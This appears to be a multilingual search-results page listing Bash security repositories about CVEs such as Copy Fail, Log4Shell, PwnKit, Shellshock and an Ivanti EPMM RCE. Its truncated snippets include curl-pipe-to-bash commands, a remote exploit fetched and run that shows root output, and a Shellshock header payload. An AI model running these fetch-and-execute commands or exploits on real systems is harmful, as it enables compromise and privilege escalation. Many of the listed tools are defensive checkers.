3053 matches found
CVE-2026-31431_Kernel_Checker
Para servidores con Internet libre: root@kitploit: curl -fsSL https://raw.githubusercontent.com/ShahaB108/CVE-2026-31431KernelChecker/main/kernelcheck.sh | bash Para servidores en Irán: root@kitploit: curl -fsSL...
cve-2026-31431-check
cve-2026-31431-check cve-2026-31431-check is a small Bash triage script for checking local Linux exposure and mitigation indicators for CVE-2026-31431, also known as "Copy Fail." The script targets Debian, Ubuntu, and Debian-family derivatives including Linux Mint, Pop!OS, and similar...
copyFail-CVE-2026-31431-workaround-bash
copyFail-CVE-2026-31431-workaround-bash algunos usos: root@kitploit: user@host:$ python3 -c "$curl -s https://copy.fail/exp -o-" id uid=0root gid=1000user ctrl+d user@host:$ git clone https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash user@host:$ sudo bash...
cve-2021-44228-waf-tests
Script bash sencillo para probar tu WAF u otros dispositivos contra cadenas de ataque Log4Shell y varios bypass Trucos de bypass de: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words Para ejecutarlo: root@kitploit: ./cve-2021-44228.sh -t -c O para usar los valores predeterminados ...
log4jhound
log4jhound Script de Bash que detecta ocurrencias de Log4j en tus proyectos y sistemas: desempaqueta JARs y analiza sus archivos Manifest, búsqueda de texto en el código fuente. Uso: ./log4jhound.sh directorioraíz...
CVE-2021-4034
CVE-2021-4034 CVE-2021-4034 in Bash Script Usage: source curl -s https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh...
CVE-2021-4034
CVE-2021-4034 ¿Archivo BASH sin capacidades de descarga? ¡Cópialo y pégalo!...
CVE-2026-1281-Ivanti-EPMM-RCE
CVE-2026-1281 y CVE-2026-1340 - Ivanti EPMM RCE Pre-Auth ⚠️ AVISO LEGAL: Este PoC se proporciona únicamente con fines educativos y de investigación en seguridad. Su uso sin autorización explícita es ilegal. 🎯 Descripción Proof of Concept PoC completo para la explotación de las vulnerabilidades...
CVE_kernellinux_jsh
CVEkernellinuxjsh — kernelsec Framework Autor: jshDevs · Versión: 0.1.0-scaffold · Licencia: MIT Framework modular en Bash para auditar y remediar CVEs críticos del kernel Linux en distribuciones RPM-based AlmaLinux 8/9, Rocky Linux 8/9, CentOS Stream 8/9/10. CVEs cubiertos...
it355-lab4-enterprise-lan-security
IT355 Laboratorio 4: Seguridad de LAN Empresarial y Análisis de Shellshock 📌 Resumen del Proyecto Este repositorio contiene una evaluación de seguridad integral de un entorno de LAN empresarial. El enfoque principal de este proyecto fue la identificación, explotación y remediación de la...
defender
🛡️ Linux-Defender.sh 📝 目录 📌 概述 🚀 功能特性 🐧 支持的发行版 📦 已安装的工具 ⚙️ 安装 从源码构建(通用) 📦 软件包安装 Debian .deb 软件包 Arch Linux 软件包 🧰 运行 Defender 🧾 许可证 🙋♂️ 作者 ☕ 支持与贡献 📌 概述 Linux Defender 是一个强大且易于使用的 Bash 脚本,旨在显著增强 Linux 系统的安全态势。该工具面向安全专业人员、爱好者和系统管理员,可自动完成在多种主流 Linux 发行版中安装、配置和管理基本安全工具的复杂流程。借助 Linux...
CVE-2026-67401
cve-id Donate...
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE
Objetivo Dummy de RCE pre-auth de Ivanti EPMM Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad de RCE pre-auth de Ivanti EPMM CVE-2026-1281 / CVE-2026-1340 con fines educativos y de investigación en seguridad. Resumen de la Vulnerabilidad Esta vulnerabilidad...
Exploit-CVE-2026-24061
Exploit en bash para telnet CVE-2026-24061...
CVE-2026-31431-Copy-Fail
CVE-2026-31431 - Verification and Mitigation Script This repository documents a Bash script used to assess exposure to CVE-2026-31431 on Linux hosts, with a focus on Ubuntu, and to apply a simple mitigation by blocking the algifaead module. Language versions: English: README.md Portuguese:...
docker_CVE-2014-6271.
dockerCVE-2014-6271. 1. docker build -t DOCKERIMAGENAME /path/to/dockerfiledirectory 2. docker run -it -d -p 8080:80 DOCKERIMAGENAME 3. verificar ejecución con: docker ps 4. verificar ejecución del servidor web: http://localhost:8080 5. explotar vulnerabilidad : curl -H "user-agent: :; ; echo;...
cve_2022_0492
Shell 脚本模板 一个现代 Bash 脚本模板,具有彩色输出格式和实用函数,用于创建专业的命令行工具。 功能特性 🎨 彩色输出 :预定义的颜色方案和格式化函数 📝 标准化消息 :一致的信息、成功、警告和错误消息格式 🔧 实用函数 :可直接用于常见 shell 脚本操作的现成函数 📦 模块化设计 :独立的库文件,便于在项目中重复使用 ⚡ 易于设置 :简单的 source 机制即可立即使用 快速开始 1. 克隆或下载此模板 2. 使你的脚本可执行: root@kitploit: chmod +x script.sh 3. 运行示例脚本: root@kitploit: ./script.s...
CVE-2025-21385
SSRF Exploit Script 这个仓库包含一个用于执行SSRF(服务端请求伪造)漏洞利用的脚本,仅供测试和教育用途。请负责任地使用此工具,仅在获得明确授权的情况下使用。 特性 利用目标系统中的SSRF漏洞。 验证输入URL以防止误用。 易于使用的CLI界面,包含清晰的错误信息和帮助菜单。 依赖 bash(Unix shell) jq(JSON处理器) curl(HTTP请求命令行工具) 使用方法 语法 root@kitploit: ./script.sh --exploit 选项 选项| 描述 ---|--- -h, --help| 显示帮助菜单。 --exploit tu p...
ZeroTrace
ZeroTrace ZeroTrace 是一个强大的用于匿名化的道德黑客工具,用 Bash 开发。它通过将你系统的所有网络流量(不仅仅是浏览器流量)路由通过 Tor 网络,帮助你在网上保持匿名。因此,追踪你的在线活动、IP地址和位置变得极其困难。 特性 将所有互联网流量通过 Tor 网络发送 隐藏你的真实IP地址和位置 使得追踪你的在线活动极其困难 允许你手动或自动更改IP 显示当前Tor IP和位置 易于使用,界面友好,适合初学者 适用于 Debian、RHEL、Arch 免责声明 此工具仅供道德黑客、隐私保护和教育用途。请勿将其用于非法目的。作者不对任何滥用行为负责。 依赖要求 Gn...